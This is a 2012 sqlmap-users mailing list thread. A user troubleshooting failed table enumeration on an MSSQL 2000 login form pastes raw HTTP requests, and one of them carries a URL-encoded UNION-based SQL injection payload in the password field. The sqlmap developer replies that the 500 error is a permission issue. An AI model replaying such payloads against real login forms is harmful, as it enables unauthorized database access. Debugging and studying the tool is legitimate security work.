Re: [sqlmap-users] Injection on Post Parameter MSSQL 2000 Enumerating Tables issue
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Injection on Post Parameter MSSQL 2000 Enumerating Tables issue
|
From: Miroslav S. <mir...@gm...> - 2012-02-22 06:46:20
|
P.s. http://support.microsoft.com/kb/240872 This is a classic permission error. I am more than keen to see how Havij does this. Waiting for your reply Kind regards, Miroslav Stampar On Feb 22, 2012 7:38 AM, "Miroslav Stampar" <mir...@gm...> wrote: > Hi. > > As there is no DBUSERNAME in the request I would say that the request is > not the problem here. Now, I am interested how Havij manages it though. > > Is there a way for you to provide me privately with either: target url or > untouched traffic file together with Burp log for Havij run against that > target? > > Without more info I won't be able to help you more > > Kind regards, > Miroslav Stampar > On Feb 21, 2012 10:25 PM, "John Booth" <sql...@ho...> wrote: > >> DBUSERNAME = database user name >> >> DATABASENAME = name of the current database >> >> >> let me know if this is not helpful or if you need the snippet of html >> (which is just the hopepage) >> >> >> HTTP request [#1]: >> >> POST /index.asp?action=auth HTTP/1.1 >> >> Accept-Encoding: identity >> >> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 >> >> Host: site.com >> >> Accept-language: en-us,en;q=0.5 >> >> Pragma: no-cache >> >> Cache-control: no-cache,no-store >> >> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 >> >> User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) >> AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24 >> >> Connection: close >> >> >> UN=admin&PW=admin&x=0&y=0 >> >> >> HTTP response [#1] (200 OK): >> >> Content-length: 7091 >> >> X-powered-by: ASP.NET >> >> Set-cookie: sitecom=0; path=/, >> ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP; path=/ >> >> Age: 6 >> >> Uri: http://site.com:80/index.asp?action=auth >> >> Server: Microsoft-IIS/6.0 >> >> Connection: close >> >> Cache-control: private >> >> Date: Tue, 21 Feb 2012 21:15:23 GMT >> >> Content-type: text/html >> >> >> >> ** >> >> >> HTML OF HOMEPAGE - if relevant will add >> >> >> ** >> >> >> >> ############################################################################ >> >> >> HTTP request [#2]: >> >> POST /index.asp?action=auth HTTP/1.1 >> >> Accept-Encoding: identity >> >> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 >> >> Host: site.com >> >> Accept-language: en-us,en;q=0.5 >> >> Pragma: no-cache >> >> Cache-control: no-cache,no-store >> >> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 >> >> User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) >> AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24 >> >> Cookie: ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP;sitecom=0 >> >> Connection: close >> >> >> UN=admin&PW=-8805%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%2858%29%2BISNULL%28CAST%28COUNT%28%2A%29%2 >> 0AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%2858%29%2BCHAR%28114%29%2BCHAR%28120%29%2BCHAR%28100%29%2BCHAR%2858%29%20FROM%20DATABASENAME..sysobjects%20IN >> NER%20JOIN%20DATABASENAME..sysusers%20ON%20DATABASENAME..sysobjects.uid%20%3D%20DATABASENAME..sysusers.uid%20WHERE%20DATABASENAME..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%2 >> 8118%29%29--%20%20AND%20%27qqvj%27%3D%27qqvj&x=0&y=0 >> >> >> HTTP response [#2] (500 Internal Server Error): >> >> Content-length: 480 >> >> X-powered-by: ASP.NET >> >> Set-cookie: sitecom=0; path=/ >> >> Age: 2 >> >> Uri: http://www.site.com:80/index.asp?action=auth >> >> Server: Microsoft-IIS/6.0 >> >> Connection: close >> >> Cache-control: private, no-store >> >> Date: Tue, 21 Feb 2012 21:15:28 GMT >> >> Content-type: text/html >> >> >> >> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> >> >> <html> >> >> <head> >> >> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> >> >> >> <font face="Arial" size=2> >> >> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" >> size=2>error '80004005'</font> >> >> <p> >> >> <font face="Arial" size=2>Server user 'DBUSERNAME' is not a valid user in >> database 'DATABASENAME'.</font> >> >> <p> >> >> <font face="Arial" size=2>/index.asp</font><font face="Arial" size=2>, >> line 16</font> >> >> >> >> ############################################################################ >> >> >> |